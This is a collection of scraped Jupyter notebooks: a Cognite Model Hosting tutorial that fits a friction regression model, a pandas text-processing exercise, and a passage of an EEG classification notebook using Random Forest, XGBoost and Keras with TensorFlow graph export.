https://github.com/tibnor/cognite-python-docs
| 0 | 0 |
Apache-2.0
| 2022-01-12T11:31:53 | 2019-04-01T11:48:17 | null |
Jupyter Notebook
| false | false |
.py
| 171,470 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Introduction
#
# In this tutorial we will show how to train a model locally and deploy it to Cognite Model Hosting.
#
# Imagine you have some equipment with temperature and pressure sensors. A key factor to achieving a long lifecycle for this type of equipment is to make sure the friction isn't too high. You can measure the friction, but it's expensive - so you would prefer to avoid it. The physics are known, so you know friction follows the formula `f = b0 + b1*t + b2*p * b3*sqrt(t*p)`. But you don't know the constants `b0, b1, b2, b3`. You decide to measure the friction for two days and then estimate the constants with linear regression. You'll train with data from the first day and validate with data from day two.
#
# **Requirements**:
# - You need to have `cognite-model-hosting-notebook`, `pandas`, `scikit-learn` and `matplotlib` installed
# - The environment variable `COGNITE_API_KEY` should be set
# # Training data
#
# You can use your own data or you can generate some fake data by running the `generate_data.py` script.
# The ids of the time series we will use for training
# NOTE: USE YOUR OWN TIME SERIES OR THOSE YOU GET FROM generate_data.py
ts_ids = {
    'temperature': 1679922414096185,
    'pressure': 3284093576623567,
    'friction': 413574373177922,
}
# We'll define our training and validation data in a DataSpec.
# +
from cognite.model_hosting.data_spec import DataSpec, TimeSeriesSpec
from datetime import datetime
# Training data: day one (2019-03-01), 1-minute averages of all three series.
training_data_spec = DataSpec(time_series={
    alias: TimeSeriesSpec(
        id=ts_id,
        start=datetime(2019, 3, 1),
        end=datetime(2019, 3, 2),
        aggregate="average",
        granularity="1m",
    )
    for alias, ts_id in ts_ids.items()
})
# Validation data: day two (2019-03-02), same aggregation.
validation_data_spec = DataSpec(time_series={
    alias: TimeSeriesSpec(
        id=ts_id,
        start=datetime(2019, 3, 2),
        end=datetime(2019, 3, 3),
        aggregate="average",
        granularity="1m",
    )
    for alias, ts_id in ts_ids.items()
})
# -
# And then we can use the DataFetcher to fetch the training data and have a look at it.
# +
from cognite.model_hosting.data_fetcher import DataFetcher
data_fetcher = DataFetcher(training_data_spec)
df = data_fetcher.time_series.fetch_dataframe(["temperature", "pressure", "friction"])
# %matplotlib inline
df.plot(x="timestamp")
# -
# # Defining the model
#
# Creating a model is quite easy. First we define our requirements. We're going to use `cognite-model-hosting` and `scikit-learn`.
# +
# # !requirements
# cognite-model-hosting==0.1.0
# scikit-learn==0.20.3
# -
# Then we write code. We need to define three functions: `train_model()`, `load_model()` and `predict()`.
# # !model
import pickle
import numpy as np
from sklearn.linear_model import LinearRegression
from cognite.model_hosting.data_fetcher import DataFetcher
def train_model(open_artifact, data_spec):
    """Fit the friction regressor and persist it as ``regressor.pkl``.

    Fetches the temperature/pressure/friction series described by
    ``data_spec``, builds the feature matrix [temperature, pressure,
    intercept, sqrt(temperature*pressure)] and fits a linear regression of
    friction on it. The fitted model is pickled via ``open_artifact``.
    """
    frame = DataFetcher(data_spec).time_series.fetch_dataframe(
        ["temperature", "pressure", "friction"]
    )
    features = frame[["temperature", "pressure"]].copy()
    features["intercept"] = np.ones(len(features))
    features["sqrt_temp_press"] = np.sqrt(features.temperature * features.pressure)
    target = frame["friction"]
    regressor = LinearRegression()
    regressor.fit(features, target)
    with open_artifact("regressor.pkl", "wb") as f:
        pickle.dump(regressor, f)
# +
# # !model
def load_model(open_artifact):
    """Unpickle and return the regressor stored as ``regressor.pkl``."""
    artifact = open_artifact("regressor.pkl", "rb")
    with artifact as f:
        model = pickle.load(f)
    return model
def predict(model, instance):
regressor = model
data_fetcher = DataFetcher(instance)
df = data_fetcher.time_series.fetch_dataframe(["temperature", "pressure"])
X = df[["temperature", "pressure"]]
X["intercept"] = np.ones(len(X))
X["sqrt_temp_press"] = np.sqrt(X.temperature * X.pressure)
predicted_friction = regressor.predict(X)
return list(predicted_friction)
# -
# We simply mark every cell we want included in the model with `# !model`. We don't include the `train_model()` function since we'll do training locally in this tutorial.
#
# Our `train_model()` function must have `open_artifact` as it's first parameter. The second parameter is user-defined. `open_artifact` is just like the builtin function `open()`. It can be used to read and write files. But `open_artifact()` points to a storage location specific for the artifacts of a single model version. When you train locally this will just be a folder on your machine, while when you train in Model Hosting this will be a special cloud storage location.
#
# The purpose of `load_model()` is to load our model from the artifact storage - from where it was written in `train_model`. It's first parameter must be `open_artifact`.
#
# The `predict()` method must take `model` as the first parameter and `instance` as second. The `model` parameter is whatever `load_model` returns and can be an arbitrary Python value, but is in this case an instance of LinearRegression (our trained regressor). `instance` is the value to do prediction on. We have here assumed the user will pass in a data spec as instance, but it can be whatever you want as long as it's JSON serializable.
#
# Okay, let's train our model locally.
# +
from cognite.model_hosting.notebook import local_artifacts
# Train locally; artifacts are written under artifacts/tutorial-friction/.
train_model(local_artifacts("tutorial-friction"), training_data_spec)
# -
# That's it! `local_artifacts()` creates a version of `open_artifact` that points the folder `artifacts/<name>/`. So you will find the artifacts created during training in the folder `artifacts/tutorial-friction/` - check it out!
# # Testing locally
#
# Before we deploy this to Model Hosting we can try out prediction locally on our validation data.
model = load_model(local_artifacts("tutorial-friction"))
predictions = predict(model, validation_data_spec)
# +
# Plot predicted vs. measured friction on the validation day.
data_fetcher = DataFetcher(validation_data_spec)
df = data_fetcher.time_series.fetch_dataframe(["temperature", "pressure", "friction"])
df["predicted_friction"] = predictions
# %matplotlib inline
df.plot(x="timestamp")
# -
# Looks good (almost perfect actually - that's because we use fake data in this tutorial).
# If this was a real use case we would probably do more than just plot the predictions, but we will leave it at that and turn our focus on how to deploy.
# # Deploy our model
# +
from cognite.client import CogniteClient
from cognite.model_hosting.notebook import deploy_model_version
# Requires the COGNITE_API_KEY environment variable (see Requirements above).
model_hosting = CogniteClient().experimental.model_hosting
# -
# Before we can deploy a model version we must have a model.
model_id = model_hosting.models.create_model("tutorial-friction").id
# And then we deploy this notebook and our trained model as a model version. It's important you **save the notebook** before doing this since the notebook file will be read to find your model. Note that we specify the folder we saved artifacts to during training. All artifacts/files in this folder are uploaded.
model_version_id = deploy_model_version(
    name="tutorial-friction-v1",
    model_id=model_id,
    runtime_version="0.1",
    artifacts_directory="artifacts/tutorial-friction",
)
# Now we just have to wait for the deployment to finish. This usually takes a few minutes. Notice that the next step won't work before the status of the model version is 'READY'.
model_hosting.models.get_model_version(model_id, model_version_id).status
# # Testing the model
#
# Now that it's deployed we can test it out. Let's perform the same prediction as we did locally - on the validation data.
predictions = model_hosting.models.online_predict(model_id, model_version_id, instances=[validation_data_spec])[0]
# +
data_fetcher = DataFetcher(validation_data_spec)
df = data_fetcher.time_series.fetch_dataframe(["temperature", "pressure", "friction"])
df["predicted_friction"] = predictions
# %matplotlib inline
df.plot(x="timestamp")
# -
# Same result as we got locally! It's important to note that these predictions were performed in Cognite Model Hosting in the cloud, not on your computer. Anyone with internet (and appropriate access rights) can now access this model!
# When you're done - remember to clean up after yourself:
# Fetch the source package id before the model is deleted, then remove both.
source_package_id = model_hosting.models.get_model_version(model_id, model_version_id).source_package_id
model_hosting.models.delete_model(model_id)
model_hosting.source_packages.delete_source_package(source_package_id)
| 8,615 |
/Example/.ipynb_checkpoints/Global_Variable_initialzer Example Code-checkpoint.ipynb
|
a28d37b747569a00e2fbc92f1585a73cb1c28a5c
|
[] |
no_license
|
b8goal/TensorFlow
|
https://github.com/b8goal/TensorFlow
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 10,500 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ---
#
# _You are currently looking at **version 1.0** of this notebook. To download notebooks and datafiles, as well as get help on Jupyter notebooks in the Coursera platform, visit the [Jupyter Notebook FAQ](https://www.coursera.org/learn/python-text-mining/resources/d9pwm) course resource._
#
# ---
# # Working with Text Data in pandas
# +
import pandas as pd
time_sentences = ["Monday: The doctor's appointment is at 2:45pm.",
                  "Tuesday: The dentist's appointment is at 11:30 am.",
                  "Wednesday: At 7:00pm, there is a basketball game!",
                  "Thursday: Be back home by 11:15 pm at the latest.",
                  "Friday: Take the train at 08:10 am, arrive at 09:00am."]
df = pd.DataFrame(time_sentences, columns=['text'])
df
# -
# find the number of characters for each string in df['text']
df['text'].str.len()
# find the number of tokens (whitespace-separated words) for each string in df['text']
df['text'].str.split().str.len()
# find which entries contain the word 'appointment'
df['text'].str.contains('appointment')
# find how many times a digit occurs in each string
df['text'].str.count(r'\d')
# find all occurrences of the digits
df['text'].str.findall(r'\d')
# group and find the hours and minutes: (\d?\d) = 1-2 digit hour, (\d\d) = 2-digit minute
df['text'].str.findall(r'(\d?\d):(\d\d)')
# replace weekdays (any word ending in 'day') with '???'
df['text'].str.replace(r'\w+day\b', '???')
# replace weekdays with 3 letter abbreviations
df['text'].str.replace(r'(\w+day\b)', lambda x: x.groups()[0][:3])
# create new columns from first match of extracted groups
df['text'].str.extract(r'(\d?\d):(\d\d)')
# extract the entire time, the hours, the minutes, and the period
df['text'].str.extractall(r'((\d?\d):(\d\d) ?([ap]m))')
# extract the entire time, the hours, the minutes, and the period with group names
df['text'].str.extractall(r'(?P<time>(?P<hour>\d?\d):(?P<minute>\d\d) ?(?P<period>[ap]m))')
phaLow.mean(),
forward.betaHigh.mean(), forward.betaLow.mean(), forward.alphaHigh.mean(),
forward.gammaLow.mean(), forward.gammaMid.mean()]
# Mean band power for the 'rest' condition; u and d (back/forward) are built
# the same way in the preceding lines.
r = [rest.delta.mean(), rest.theta.mean(), rest.alphaLow.mean(),
     rest.betaHigh.mean(), rest.betaLow.mean(), rest.alphaHigh.mean(),
     rest.gammaLow.mean(), rest.gammaMid.mean()]
# NOTE(review): the value lists are ordered (..., alphaLow, betaHigh, betaLow,
# alphaHigh, ...) while the index labels read (..., alphaLow, alphaHigh,
# betaLow, betaHigh, ...) -- alphaHigh and betaHigh appear swapped in the chart.
index = ['delta', 'theta', 'alphaLow','alphaHigh', 'betaLow', 'betaHigh', 'gammaLow', 'gammaMid']
df = pd.DataFrame({'back': u, 'forward': d, 'rest': r}, index=index)
ax = df.plot.bar(rot=0, figsize=(20,10))
# +
# Build the (n_records, 8) feature matrix: one row per record, one column per
# EEG frequency band.
data = np.array([[0 for x in range(8)] for y in range(len(dataDF))])
# NOTE(review): `data` has integer dtype; if the band powers are floats they
# are truncated on assignment. dataDF[band_columns].values would avoid the loop.
for i in range(len(dataDF)):
    data[i] = [dataDF.delta.values[i],
               dataDF.theta.values[i],
               dataDF.alphaLow.values[i],
               dataDF.alphaHigh.values[i],
               dataDF.betaLow.values[i],
               dataDF.betaHigh.values[i],
               dataDF.gammaLow.values[i],
               dataDF.gammaMid.values[i]]
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelBinarizer, LabelEncoder
# NOTE(review): the LabelBinarizer is immediately overwritten; only the
# LabelEncoder is actually used.
encoder = LabelBinarizer()
encoder = LabelEncoder()
labels = encoder.fit_transform(dataDF.action.values)
# creating training and test sets
x_train, x_test, y_train, y_test = train_test_split(data, labels)
print(x_train.max())
print(x_train.min())
from sklearn.preprocessing import MinMaxScaler, StandardScaler
# Standardize features; the MinMaxScaler created here is not used until later cells.
scaler = MinMaxScaler()
stan_scaler = StandardScaler()
x_train = stan_scaler.fit_transform(x_train)
x_test = stan_scaler.transform(x_test)
# Unscaled copies used for cross-validation in later cells.
all_labels = dataDF.action.values
all_data = dataDF.drop(['action'], axis=1)
# -
# +
from sklearn import model_selection
from sklearn.ensemble import RandomForestClassifier
from sklearn import metrics
from sklearn.model_selection import cross_val_score
# XGBoost (NOTE(review): duplicate imports of metrics/cross_val_score above)
from sklearn import metrics
from sklearn.model_selection import cross_val_score
from xgboost import XGBClassifier
from numpy import sort
from sklearn.metrics import accuracy_score
from sklearn.feature_selection import SelectFromModel
# Random Forest baseline on the scaled train/test split.
rfc = RandomForestClassifier()
rfc.fit(x_train, y_train)
print(rfc.feature_importances_)
print("The score for Random Forest ", rfc.score(x_test, y_test))
y_pred = rfc.predict(x_test)
#Import scikit-learn metrics module for accuracy calculation
# Model Accuracy, how often is the classifier correct?
print(len(y_train))
print("Accuracy for x_test:", metrics.accuracy_score(y_test, y_pred))
# NOTE(review): cross-validation runs on the unscaled all_data while the model
# above was fit on standardized features -- results are not directly comparable.
scores = cross_val_score(rfc, all_data, labels, cv=10, scoring='accuracy')
print("Cross Validation Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
print(scores)
# Fit model using each importance as a threshold
thresholds = sort(rfc.feature_importances_)
for thresh in thresholds:
    # select features using threshold
    selection = SelectFromModel(rfc, threshold=thresh, prefit=True)
    select_X_train = selection.transform(x_train)
    # train model
    selection_model = RandomForestClassifier()
    selection_model.fit(select_X_train, y_train)
    # eval model
    select_X_test = selection.transform(x_test)
    y_pred = selection_model.predict(select_X_test)
    predictions = [round(value) for value in y_pred]
    accuracy = accuracy_score(y_test, predictions)
    print("Thresh=%.3f, n=%d, Accuracy: %.2f%%" % (thresh, select_X_train.shape[1], accuracy*100.0))
# -
from sklearn import tree
from subprocess import call
# Display in jupyter notebook
from IPython.display import Image
# Export each tree of the forest to a Graphviz .dot file.
i_tree = 0
for tree_in_forest in rfc.estimators_:
    with open('tree_' + str(i_tree) + '.dot', 'w') as my_file:
        # NOTE(review): rebinding my_file to export_graphviz's return value
        # inside the with-block is confusing (presumably None when out_file
        # is given -- confirm against the sklearn docs).
        my_file = tree.export_graphviz(tree_in_forest, out_file = my_file)
    i_tree = i_tree + 1
# Render each .dot to .png with the Graphviz 'dot' binary.
i_tree = 0
for tree_in_forest in rfc.estimators_:
    call(['dot', '-Tpng', 'tree_' + str(i_tree) + '.dot', '-o', 'tree_' + str(i_tree) + '.png', '-Gdpi=600'])
    # NOTE(review): the Image(...) return value is discarded inside the loop,
    # so nothing is actually displayed here.
    Image(filename = 'tree_' + str(i_tree) + '.png')
    i_tree = i_tree + 1
# +
# XGBoost with default hyper-parameters, plus feature-importance and
# single-tree visualizations.
from sklearn import metrics
from sklearn.model_selection import cross_val_score
from xgboost import XGBClassifier
from xgboost import plot_importance
from matplotlib import pyplot
from xgboost import plot_tree
xgb = XGBClassifier()
xgb.fit(x_train, y_train)
# plot feature importance
plot_importance(xgb)
pyplot.show()
print(xgb)
print("The score for XGBoost ", xgb.score(x_test, y_test))
y_pred = xgb.predict(x_test)
print("Accuracy for x_test:", metrics.accuracy_score(y_test, y_pred))
predictions = [round(value) for value in y_pred]
# evaluate predictions
accuracy = metrics.accuracy_score(y_test, predictions)
print("Accuracy: %.2f%%" % (accuracy * 100.0))
# NOTE(review): cross-validation runs on unscaled all_data, unlike the fit above.
scores = cross_val_score(xgb, all_data, labels, cv=10, scoring='accuracy')
print("Cross Validation Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
print(scores)
plot_tree(xgb)
plt.show()
# Fit model using each importance as a threshold
thresholds = sort(xgb.feature_importances_)
for thresh in thresholds:
    # select features using threshold
    selection = SelectFromModel(xgb, threshold=thresh, prefit=True)
    select_X_train = selection.transform(x_train)
    # train model
    selection_model = XGBClassifier()
    selection_model.fit(select_X_train, y_train)
    # eval model
    select_X_test = selection.transform(x_test)
    y_pred = selection_model.predict(select_X_test)
    predictions = [round(value) for value in y_pred]
    accuracy = accuracy_score(y_test, predictions)
    print("Thresh=%.3f, n=%d, Accuracy: %.2f%%" % (thresh, select_X_train.shape[1], accuracy*100.0))
# +
# Large rendering of a single tree (tree #4) from the default-parameter model.
fig, ax = plt.subplots(figsize=(30, 30))
plot_tree(xgb, num_trees=4, ax=ax)
plt.show()
# -
def plot_confusion_matrix(cm, classes,
                          normalize=False,
                          title='confusion matrix',
                          cmap=plt.cm.Blues):
    """Plot a confusion matrix as a heatmap with per-cell value labels.

    Parameters
    ----------
    cm : square array, e.g. from sklearn.metrics.confusion_matrix.
    classes : sequence of class names used for the axis ticks.
    normalize : if True, convert counts to per-true-class fractions.
    title : figure title.
    cmap : matplotlib colormap for the heatmap.
    """
    # Fix: normalize BEFORE drawing so the heatmap, the printed matrix and
    # the cell annotations all show the same values (previously the raw
    # counts were drawn even when normalize=True). Also fixes the
    # "noralized" typo in the status message.
    if normalize:
        cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
        print("normalized confusion matrix")
    else:
        print('confusion matrix without normalization')
    print(cm)
    plt.imshow(cm, interpolation='nearest', cmap=cmap)
    plt.title(title)
    plt.colorbar()
    tick_marks = np.arange(len(classes))
    plt.xticks(tick_marks, classes, rotation=45)
    plt.yticks(tick_marks, classes)
    # Label each cell, switching text color at half the maximum for contrast.
    thresh = cm.max() / 2.
    for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
        plt.text(j, i, cm[i, j],
                 horizontalalignment='center',
                 color='white' if cm[i, j] > thresh else 'black')
    plt.tight_layout()
    plt.ylabel('True label')
    plt.xlabel('predicted label')
from sklearn.metrics import confusion_matrix
import itertools
matrix = confusion_matrix(y_test, y_pred)
# Class order should match the LabelEncoder's encoding (which sorts labels
# alphabetically: back, forward, rest) -- confirm against the data.
my_labels = ['back', 'forward', 'rest']
plot_confusion_matrix(matrix, my_labels, title='Conf Matr')
# NOTE(review): eval_set/eval_metric are defined here but never passed to any
# fit call in this notebook chunk.
eval_set = [(x_train, y_train), (x_test, y_test)]
eval_metric = ["auc","error"]
# # Model Tuning and feature importance XGBoost
# +
# XGBoost (imports repeated from the earlier cell)
from sklearn import metrics
from sklearn.model_selection import cross_val_score
from xgboost import XGBClassifier
from numpy import sort
from sklearn.metrics import accuracy_score
from sklearn.feature_selection import SelectFromModel
# Hand-tuned XGBoost: slow learning rate, many trees, depth/regularization set.
xgb = XGBClassifier(silent=True,
                    scale_pos_weight=1,
                    learning_rate=0.01,
                    colsample_bytree = 1,
                    subsample = 1,
                    objective='multi:softprob',
                    n_estimators=1000,
                    reg_alpha = 0.3,
                    max_depth=5,
                    gamma=2)
xgb.fit(x_train, y_train)
# plot feature importance
plot_importance(xgb)
pyplot.show()
# print(xgb)
print("The score for XGBoost ", xgb.score(x_test, y_test))
y_pred = xgb.predict(x_test)
print("Accuracy for x_test:", metrics.accuracy_score(y_test, y_pred))
predictions = [round(value) for value in y_pred]
# evaluate predictions
accuracy = metrics.accuracy_score(y_test, predictions)
print("Accuracy: %.2f%%" % (accuracy * 100.0))
# NOTE(review): cross-validation uses the unscaled all_data, unlike the fit above.
scores = cross_val_score(xgb, all_data, labels, cv=10, scoring='accuracy')
print("Cross Validation Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
print(scores)
# Fit model using each importance as a threshold
thresholds = sort(xgb.feature_importances_)
for thresh in thresholds:
    # select features using threshold
    selection = SelectFromModel(xgb, threshold=thresh, prefit=True)
    select_X_train = selection.transform(x_train)
    # train model
    selection_model = XGBClassifier(silent=True,
                                    scale_pos_weight=1,
                                    learning_rate=0.01,
                                    colsample_bytree = 1,
                                    subsample = 1,
                                    objective='multi:softprob',
                                    n_estimators=1000,
                                    reg_alpha = 0.3,
                                    max_depth=5,
                                    gamma=2)
    selection_model.fit(select_X_train, y_train)
    # eval model
    select_X_test = selection.transform(x_test)
    y_pred = selection_model.predict(select_X_test)
    predictions = [round(value) for value in y_pred]
    accuracy = accuracy_score(y_test, predictions)
    print("Thresh=%.3f, n=%d, Accuracy: %.2f%%" % (thresh, select_X_train.shape[1], accuracy*100.0))
# -
# Commented-out low-level xgboost API experiment kept for reference:
# import xgboost as xgb
# dtrain = xgb.DMatrix(data, label=labels)
# param = {'max_depth': 5, 'eta': 1, 'silent': 1, 'objective': 'multi:softprob'}
# bst = xgb.train(param, dtrain, 10)
# bst.dump_model(xgb, './out/xgb_76.txt', with_stats=True)
from sklearn.externals import joblib
#save model
# NOTE(review): sklearn.externals.joblib is removed in modern scikit-learn;
# newer code should `import joblib` directly.
joblib.dump(xgb, './out/xgb_77.dat')
# +
# Scale features to [0, 1] (fit on the training split only, then apply the
# same transform to the test split) and one-hot encode the integer labels
# for the Keras softmax network defined below.
min_max_scaler = preprocessing.MinMaxScaler()
x_train = min_max_scaler.fit_transform(x_train)
x_test = min_max_scaler.transform(x_test)

from keras.utils import np_utils
# convert integers to dummy variables (i.e. one hot encoded)
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
# -
# Scratch cells: spot-check the label encoder and MinMaxScaler outputs on
# individual records.
encoder.inverse_transform([argmax(y_test[2], axis=0)])
encoder.inverse_transform(y_train)
y_test[2]
x_test[1]
y_test[0]
x_test[1]

# +
# Manual re-derivation of the min-max scaling for one record.
# NOTE(review): this arithmetic looks inverted — MinMaxScaler computes
# (x - data_min) / (data_max - data_min), while here the value is divided by
# a rescaled term. The `min_max_scaler.transform(a)` cell below is the
# authoritative check; confirm before relying on these numbers.
a = [[852567, 133691, 16747769, 19974, 16748623, 14364, 4845, 34877]]
# a = min_max_scaler.transform(a)
a_std = (a[0][0] - 16777208) / (1 - 0)
a_scaled = a_std * (16777208 - 92) + 0
a[0][0] = a[0][0] / a_scaled
a[0][0]
# -

a = [[852567, 133691, 16747769, 19974, 16748623, 14364, 4845, 34877]]
a = min_max_scaler.transform(a)
a[0]

# +
data = [[50, 1800, 3,4,5,6,7,7]]
dj = min_max_scaler.transform(data)
print(min_max_scaler.data_max_)
print(dj)

# +
data = [[34, 1800]]
dataStd = (1800 - 92) / (16777208 - 92)
data_scaled = dataStd * (1 - 0) + 0
data_scaled

# +
data = [[34, 1800]]
dataStd = (34 - 92) / (16777208 - 92)
data_scaled = dataStd * (1 - 0) + 0
data_scaled

# +
data = [[34, 1800]]
dataStd = (50 - 92) / (16777208 - 92)
data_scaled = dataStd * (1 - 0) + 0
data_scaled
# -
x_train.shape()
# +
# Define a small dense softmax network for the 3-class EEG task
# (8 band-power inputs -> 3 class probabilities).
from keras import models
from keras import layers
# from keras import regularizers kernel_regularizer=regularizers.l2(0.01),
from keras.optimizers import Adam

m = models.Sequential()
m.add(layers.Dense(16, input_shape=(8,)))
m.add(layers.Dense(32, activation="relu"))
m.add(layers.Dense(64, activation="relu"))
# NOTE(review): softmax on a hidden layer is unusual (relu/sigmoid is the
# typical choice) — confirm this was intentional.
m.add(layers.Dense(16, activation="softmax"))
m.add(layers.Dense(3, activation='softmax'))
# Adam = Adam(lr=0.05)
m.compile(optimizer=Adam(lr=0.00038),
          loss='categorical_crossentropy',
          metrics=['acc'])
m.summary()
# +
# Render the architecture diagram (requires pydot + graphviz installed).
from keras.utils import plot_model
plot_model(m, to_file='model.png')
from IPython.display import SVG
from keras.utils.vis_utils import model_to_dot
SVG(model_to_dot(m).create(prog='dot', format='svg'))
# +
# Build, train and evaluate the EEG classifier, then plot training curves.
from keras import models
from keras import layers
# from keras import regularizers kernel_regularizer=regularizers.l2(0.01),
from keras.optimizers import Adam

network = models.Sequential()
network.add(layers.Dense(16, input_shape=(8,)))
network.add(layers.Dense(32, activation="relu"))
network.add(layers.Dense(64, activation="relu"))
network.add(layers.Dense(16, activation="softmax"))
network.add(layers.Dense(3, activation='softmax'))
# Adam = Adam(lr=0.05)
network.compile(optimizer=Adam(lr=0.00038),
                loss='categorical_crossentropy',
                metrics=['acc'])
network.summary()

history = network.fit(x_train, y_train,
                      epochs=100, verbose=1, batch_size=2)
loss_and_metrics = network.evaluate(x_test, y_test)
print('loss and metrics', loss_and_metrics)

# %matplotlib inline
import matplotlib.pyplot as plt

# Plot training & validation accuracy values
# NOTE(review): only the training curve is plotted — the 'Test' legend entry
# has no corresponding line. Confirm whether validation history was intended
# (fit() was called without validation_data).
plt.plot(history.history['acc'])
plt.title('Model accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['Train', 'Test'], loc='upper left')
plt.show()

# Plot training & validation loss values
plt.plot(history.history['loss'])
plt.title('Model loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Test'], loc='upper left')
plt.show()
# +
def keras_to_tensorflow(keras_model, output_dir, model_name,out_prefix="output_", log_tensorboard=True):
    """Freeze a Keras model into a TensorFlow .pb GraphDef.

    Each model output is aliased to `<out_prefix><i>` via tf.identity so it
    can be located after freezing, all variables are converted to constants,
    and the graph is written to output_dir/model_name. If log_tensorboard is
    True, the frozen graph is also imported into TensorBoard logs under
    output_dir.
    """
    if os.path.exists(output_dir) == False:
        os.mkdir(output_dir)
    out_nodes = []
    for i in range(len(keras_model.outputs)):
        out_nodes.append(out_prefix + str(i + 1))
        # alias output i under a stable, predictable node name
        tf.identity(keras_model.output[i], out_prefix + str(i + 1))
    sess = K.get_session()
    from tensorflow.python.framework import graph_util, graph_io
    init_graph = sess.graph.as_graph_def()
    # bake current variable values into the graph as constants
    main_graph = graph_util.convert_variables_to_constants(sess, init_graph, out_nodes)
    graph_io.write_graph(main_graph, output_dir, name=model_name, as_text=False)
    if log_tensorboard:
        from tensorflow.python.tools import import_pb_to_tensorboard
        import_pb_to_tensorboard.import_to_tensorboard(
            os.path.join(output_dir, model_name),
            output_dir)

keras_to_tensorflow(network, './out', 'cat_dog.pb')
# +
def freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):
    """
    Freezes the state of a session into a pruned computation graph.

    Creates a new computation graph where variable nodes are replaced by
    constants taking their current value in the session. The new graph will be
    pruned so subgraphs that are not necessary to compute the requested
    outputs are removed.
    @param session The TensorFlow session to be frozen.
    @param keep_var_names A list of variable names that should not be frozen,
                          or None to freeze all the variables in the graph.
    @param output_names Names of the relevant graph outputs.
    @param clear_devices Remove the device directives from the graph for better portability.
    @return The frozen graph definition.
    """
    from tensorflow.python.framework.graph_util import convert_variables_to_constants
    graph = session.graph
    with graph.as_default():
        freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))
        output_names = output_names or []
        # also list every variable op as an output so nothing needed is pruned
        output_names += [v.op.name for v in tf.global_variables()]
        input_graph_def = graph.as_graph_def()
        if clear_devices:
            # strip device placement so the frozen graph loads on any machine
            for node in input_graph_def.node:
                node.device = ""
        frozen_graph = convert_variables_to_constants(session, input_graph_def,
                                                      output_names, freeze_var_names)
        return frozen_graph

from keras import backend as K
# Create, compile and train model...
# Freeze the trained `network` and write it out as a binary GraphDef.
frozen_graph = freeze_session(K.get_session(),
                              output_names=[out.op.name for out in network.outputs])
tf.train.write_graph(frozen_graph, "./out/", "my_model.pb", as_text=False)
# -
# # Export model
# +
# This was created with @warptime's help. Thank you!
# Reload the saved Keras model and freeze it into a constant-only
# TensorFlow graph (.pb) ready for inference.
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import graph_io
from keras.models import load_model
from keras import backend as K
import os.path as osp

model = load_model('out/8_wave_input_67pc.h5')
nb_classes = 3 # The number of output nodes in the model
prefix_output_node_names_of_final_network = 'output_node'
# inference mode: disables training-only behaviour (dropout, batch norm)
K.set_learning_phase(0)

pred = [None]*nb_classes
pred_node_names = [None]*nb_classes
for i in range(nb_classes):
    # alias each output under a predictable name: output_node0, output_node1, ...
    pred_node_names[i] = prefix_output_node_names_of_final_network+str(i)
    pred[i] = tf.identity(model.output[i], name=pred_node_names[i])
print('output nodes names are: ', pred_node_names)

sess = K.get_session()
output_fld = './tensorflow_model/'
if not os.path.isdir(output_fld):
    os.mkdir(output_fld)
output_graph_name = 'model' + '.pb'
output_graph_suffix = '_inference'

# replace variables with constants and serialize the graph
constant_graph = graph_util.convert_variables_to_constants(sess, sess.graph.as_graph_def(), pred_node_names)
graph_io.write_graph(constant_graph, output_fld, output_graph_name, as_text=False)
print('saved the constant graph (ready for inference) at: ', osp.join(output_fld, output_graph_name))
# -
# # Check the frozen nodes
# +
# Parse the frozen graph and list the nodes whose names contain 'output'.
g = tf.GraphDef()
g.ParseFromString(open('./out/my_model.pb', 'rb').read())
[n for n in g.node if n.name.find('output') != -1]
# -
# Distinct op types present in the frozen graph.
ops = set([n.op for n in g.node])
print(" ".join(ops))
# +
def print_graph_nodes(filename):
    """Print the input, output and keras_learning_phase nodes of a frozen
    TensorFlow GraphDef (.pb) file at `filename`."""
    import tensorflow as tf
    g = tf.GraphDef()
    # use a context manager so the file handle is closed deterministically
    # (the original left the open() handle to the garbage collector)
    with open(filename, 'rb') as pb_file:
        g.ParseFromString(pb_file.read())
    print()
    print(filename)
    print("=======================INPUT=========================")
    print([n for n in g.node if n.name.find('input') != -1])
    print("=======================OUTPUT========================")
    print([n for n in g.node if n.name.find('output') != -1])
    print("===================KERAS_LEARNING=====================")
    print([n for n in g.node if n.name.find('keras_learning_phase') != -1])
    print("======================================================")
    print()

print_graph_nodes('./out/cat_dog.pb')
# +
# Assemble the 8 EEG band-power features into an (n_records, 8) array.
# Vectorized: the original pre-allocated an *integer* numpy buffer
# (np.array of 0s) and filled it row by row, which silently truncated any
# float band powers; selecting the columns directly preserves the
# DataFrame's dtype and avoids the per-row Python loop.
feature_cols = ['delta', 'theta', 'alphaLow', 'alphaHigh',
                'betaLow', 'betaHigh', 'gammaLow', 'gammaMid']
all_data = dataDF[feature_cols].values

from sklearn.preprocessing import MinMaxScaler, StandardScaler
# Scale every feature to [0, 1] over the whole data set.
scaler = MinMaxScaler()
all_data = scaler.fit_transform(all_data)

# estimator = KerasClassifier(build_fn=network, epochs=50, batch_size=5, verbose=0)
# kfold = KFold(n_splits=10, shuffle=True, random_state=seed)
# results = cross_val_score(estimator, all_data, labels, cv=kfold)
# print("Baseline: %.2f%% (%.2f%%)" % (results.mean()*100, results.std()*100))
# +
# Manual 5-fold stratified cross-validation of the network.
from keras.applications.vgg16 import preprocess_input
from sklearn.model_selection import StratifiedKFold

